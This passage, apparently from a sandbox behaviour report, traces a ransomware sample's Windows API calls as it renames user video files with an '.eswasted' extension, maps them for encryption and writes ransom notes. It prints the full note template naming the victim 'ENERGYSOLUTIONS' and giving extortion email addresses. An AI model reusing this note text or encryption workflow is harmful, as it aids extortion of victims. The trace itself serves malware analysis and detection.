lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x111fe38, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe38*=0x7bc, lpOverlapped=0x0) returned 1 [0081.905] SetEndOfFile (hFile=0xfc) returned 1 [0081.908] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0081.908] CloseHandle (hObject=0xfc) returned 1 [0081.910] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef6b8 | out: hHeap=0x4a0000) returned 1 [0081.910] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f2e78 | out: hHeap=0x4a0000) returned 1 [0081.910] _aulldvrm () returned 0x0 [0081.910] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0081.911] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0081.911] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.911] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\h3ja.mp4") returned 49 [0081.911] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x26c) returned 0x4ef6b8 [0081.911] lstrcpyW (in: lpString1=0x4ef71a, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0081.911] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0081.911] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0081.994] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0081.994] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.994] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\h3ja.mp4.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\h3ja.mp4.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0081.995] WriteFile (in: hFile=0xfc, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0081.996] SetEndOfFile (hFile=0xfc) returned 1 [0081.996] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.997] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0081.997] lstrcpyW (in: lpString1=0x4ef71a, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0081.997] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\h3ja.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\h3ja.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\h3ja.mp4.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\h3ja.mp4.eswasted")) returned 1 [0081.998] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\h3ja.mp4.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\h3ja.mp4.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0081.998] CreateFileMappingW (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0081.998] GetFileSize (in: hFile=0x100, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0xb94f [0081.998] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xb94f) returned 0x2d0000 [0081.998] CloseHandle (hObject=0x100) returned 1 [0082.005] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0082.006] CloseHandle (hObject=0x110) returned 1 [0082.006] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4ef440 [0082.006] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0082.007] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4ef488 | out: pbBuffer=0x4ef488) returned 1 [0082.007] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.007] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0082.007] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0082.007] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.016] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4ddfd8 [0082.016] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef440 | out: hHeap=0x4a0000) returned 1 [0082.016] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0082.016] _snwprintf (in: _Dest=0x4dd498, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]XurFQGldKE+svU/vA4e3GsC+SFXtYACSEtS/GPoIojyaLhZ6sVRfS6XUEF4Y0P1b\r\nUZghJb3qRj6BD6BrGlDYZWQ6xzUIdm2sZDe360F29Tww9RJK8ItTdyhF34PoQzlA\r\nSHdGChC4hrlImGuzw8eDatJnoIA+W0ceUOBYDp2x+eNN4bs5rR3vWyn2z0jngrES\r\nGIZFMhuDPpVD9V1mJq4n4pQexxszcwh3mgIqPyHWUtFlYuWcZsivCtXFdUmoALeO\r\n5zmUPX0iYNpnSiE5HM06YM0vxysqwKNEdIDoHf6toFQYs5yCa+1tH8Cwd4Cn0KA3\r\nX1LF1UgzA1buvBpuWyC86tZYC1SNF0/GZH/7FRs/vGTLohde/nWbH+tC8ZBgwCBH\r\npM3NdySVNntptoDakxIJyDjwE8MnUbUD7rRJirxZP2BPVB63sGDAAF+HEQmG1E7j\r\nE1UdB0ERgT6vRyGlJ8MuHiCT/r8SHagzGirDnFb3QfRz9lZapq2rKM8SqVh8QqA7\r\nMK1W2iLmOlGiC0nuoehLzUM40E31fu9FI4cjMfFZ9jyqOXXTptpVqUvkBI54uIvo\r\nYvcdxe7uiCpHKQB5qOx3Jth0up4xR/dHDpbVcZ8XVPgpKEa94tJwonI2QO4AGMyW\r\nxWauNkV3sgd4QXxOXjw24d4TrwE0e6eToGjMQfMkNqM=[end_key]\r\nKEEP IT\r\n") returned 990 [0082.016] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ddfd8 | out: hHeap=0x4a0000) returned 1 [0082.016] WriteFile (in: hFile=0xfc, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x111fe38, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe38*=0x7bc, lpOverlapped=0x0) returned 1 [0082.016] SetEndOfFile (hFile=0xfc) returned 1 [0082.018] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0082.019] CloseHandle (hObject=0xfc) returned 1 [0082.020] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef6b8 | out: hHeap=0x4a0000) returned 1 [0082.020] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x502248 | out: hHeap=0x4a0000) returned 1 [0082.021] _aulldvrm () returned 0x0 [0082.021] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0082.021] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0082.021] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.021] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\mScIc02bFGf.flv") returned 56 [0082.022] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x27a) returned 0x4ef440 [0082.022] lstrcpyW (in: lpString1=0x4ef4b0, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0082.022] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0082.022] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0082.022] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0082.022] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.022] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\mScIc02bFGf.flv.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\mscic02bfgf.flv.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0082.023] WriteFile (in: hFile=0xfc, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0082.024] SetEndOfFile (hFile=0xfc) returned 1 [0082.024] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.024] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0082.024] lstrcpyW (in: lpString1=0x4ef4b0, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0082.024] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\mScIc02bFGf.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\mscic02bfgf.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\mScIc02bFGf.flv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\mscic02bfgf.flv.eswasted")) returned 1 [0082.025] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\mScIc02bFGf.flv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\mscic02bfgf.flv.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0082.025] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0082.025] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x103db [0082.025] MapViewOfFile (hFileMappingObject=0x100, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x103db) returned 0xb10000 [0082.025] CloseHandle (hObject=0x110) returned 1 [0082.029] UnmapViewOfFile (lpBaseAddress=0xb10000) returned 1 [0082.029] CloseHandle (hObject=0x100) returned 1 [0082.029] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4ef6c8 [0082.029] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0082.030] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4ef710 | out: pbBuffer=0x4ef710) returned 1 [0082.030] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.030] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0082.031] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0082.031] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.073] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4ddfd8 [0082.073] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef6c8 | out: hHeap=0x4a0000) returned 1 [0082.073] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0082.073] _snwprintf (in: _Dest=0x4dd498, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]DW9pWwWt2kCvoX816AIwm88Ra510rrvcpYFOk28z8hHjSSs6vLRp2uZFWOb9Pmt1\r\nEdsGG52Zgy7Qvsf9I/i3pyRrogwFcO50rJCCtOEn6y+D7OBWzvfr1u3uSkchC8YA\r\nm8K15RIvLl/qWpE2sM9LIXpf8aXJflp2RLTpGHY8z108ggII9mHK1g5Ftb5SYeps\r\n6VAcOdRGxIOagOUZkrxxSMLtKeS6kqkJpgdGDKSjeZzwdNrj+x2IFjhMUrI7sJNx\r\n06uzxNBTQghsaoT2hpt81BYg5nz/obysU/TQeqXEl5QbIcrAozGdZjhMrh3+XbYU\r\npDA3uL3dzRLdL2x+6by/AMWZQTtoSjtg1ncs+htpgIDp1W7DAJpKtWa7ysGp7E9B\r\nLbMJccNNWTK8nJECpSZjeaByi4/U//J5rayPLDNlOFSygGOSTC3cyEMg0kVWqEtz\r\nk0R1wdjGr9eW3ARk2rCVmMF/tkoHxquezuwrm/Z0ymD4q4NY+cyWk1+9w0j69LZJ\r\niI7Fo1TagAOHaD2aTPHW13UFl12ZImOsSjNXJktymATdrVAXvyqObmVKRSNsV6NM\r\n5eok+SNPxAZb17Aj2Hu6BhestnfW8Qqxgefp3GtWchB8/8JO9FfgTiURmvZ1Fom/\r\n3VP3QGvNkJSxY246g+Zxwl/jxbxSJxyRRFVl0jmSFXi=[end_key]\r\nKEEP IT\r\n") returned 990 [0082.073] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ddfd8 | out: hHeap=0x4a0000) returned 1 [0082.073] WriteFile (in: hFile=0xfc, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x111fe38, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe38*=0x7bc, lpOverlapped=0x0) returned 1 [0082.073] SetEndOfFile (hFile=0xfc) returned 1 [0082.076] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0082.076] CloseHandle (hObject=0xfc) returned 1 [0082.078] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef440 | out: hHeap=0x4a0000) returned 1 [0082.078] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f4698 | out: hHeap=0x4a0000) returned 1 [0082.078] _aulldvrm () returned 0x0 [0082.078] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0082.079] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0082.079] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.079] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\S6itYta_Zgcx.flv") returned 57 [0082.079] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x27c) returned 0x4ef440 [0082.079] lstrcpyW (in: lpString1=0x4ef4b2, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0082.079] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0082.079] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0082.080] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0082.080] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.080] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\S6itYta_Zgcx.flv.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\s6ityta_zgcx.flv.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0082.080] WriteFile (in: hFile=0xfc, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0082.081] SetEndOfFile (hFile=0xfc) returned 1 [0082.081] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.081] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0082.081] lstrcpyW (in: lpString1=0x4ef4b2, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0082.082] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\S6itYta_Zgcx.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\s6ityta_zgcx.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\S6itYta_Zgcx.flv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\s6ityta_zgcx.flv.eswasted")) returned 1 [0082.082] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\S6itYta_Zgcx.flv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\s6ityta_zgcx.flv.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0082.082] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0082.083] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x16839 [0082.083] MapViewOfFile (hFileMappingObject=0xf8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16839) returned 0xb10000 [0082.083] CloseHandle (hObject=0x110) returned 1 [0082.087] UnmapViewOfFile (lpBaseAddress=0xb10000) returned 1 [0082.088] CloseHandle (hObject=0xf8) returned 1 [0082.088] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4ef6c8 [0082.088] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0082.088] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4ef710 | out: pbBuffer=0x4ef710) returned 1 [0082.088] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.089] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0082.089] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0082.089] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.097] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4ddfd8 [0082.097] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef6c8 | out: hHeap=0x4a0000) returned 1 [0082.097] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0082.097] _snwprintf (in: _Dest=0x4dd498, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]OvrTAQtjtwN4DJ1otXC8OAKvD2ClrXZab6ToKyFpzdBBo4NG3EVzwDGedjnRsBMA\r\n+N4rmX8Oiw2ZhClBJzeEZWAWD/Xhesu4+9e+mGRqUHvp/t7le8rOcRdcbuMSYDtf\r\nD79aBD1SVks0E8wXv7cJn3KcaQMHz7MPMHNfkOZPdYt6zb9GkEfhmU/jzyj7X30e\r\n62Ox2x0ly8q1oNuhYwOaqqTtFeAKkvUP5xDHvsnSautTn095yfdsGtEZ3vNqUESl\r\n2c9GrArzbzllYij8p7nJz0kv1GPXozOhO/+hT6sA3Pv2ozll3q60x45mqjxBboQ0\r\nnwHBw8kcvxL/840sjZQ7Bqs5KnUzwbY45AK8n7/o0JJH4znY0iZ5goglgb0FsUAV\r\ndry/IkkAVAn12DkXEWNQV7IUCgH3QdqbeyvlqQTImzfJAj0ja/r5RT1QrF1Bvq/v\r\nm0Yp7Xpkvf9QEfcALOh8X7yllQ8iSlY5uM3Ew3P/i9PxaBYMPB7tBb/2hPZeesxH\r\nf73Xwafh3aiBkotj8CLj2r+93abBx2Zu7D3/ku96JXYOq8bR41txiYw5HfGOhpzy\r\nx3RwhU5Lf5u0/7c8iQ13+Wp5rsEVa10kfR4NOrgG6btr2M9eYQ0w0SPjRfnUQB9q\r\niFaDcWA/+GEzI90wDn6abyuniC5QNiTE20p4WKqjk8m=[end_key]\r\nKEEP IT\r\n") returned 990 [0082.098] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ddfd8 | out: hHeap=0x4a0000) returned 1 [0082.098] WriteFile (in: hFile=0xfc, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x111fe38, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe38*=0x7bc, lpOverlapped=0x0) returned 1 [0082.098] SetEndOfFile (hFile=0xfc) returned 1 [0082.100] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0082.100] CloseHandle (hObject=0xfc) returned 1 [0082.102] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef440 | out: hHeap=0x4a0000) returned 1 [0082.102] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f4768 | out: hHeap=0x4a0000) returned 1 [0082.102] _aulldvrm () returned 0x0 [0082.102] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0082.103] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0082.103] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.104] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SvYjXIGI6H VJRLLpY.flv") returned 63 [0082.104] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x288) returned 0x4ef440 [0082.104] lstrcpyW (in: lpString1=0x4ef4be, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0082.104] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0082.105] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0082.105] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0082.106] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.106] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SvYjXIGI6H VJRLLpY.flv.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\svyjxigi6h vjrllpy.flv.eswasted_info"), 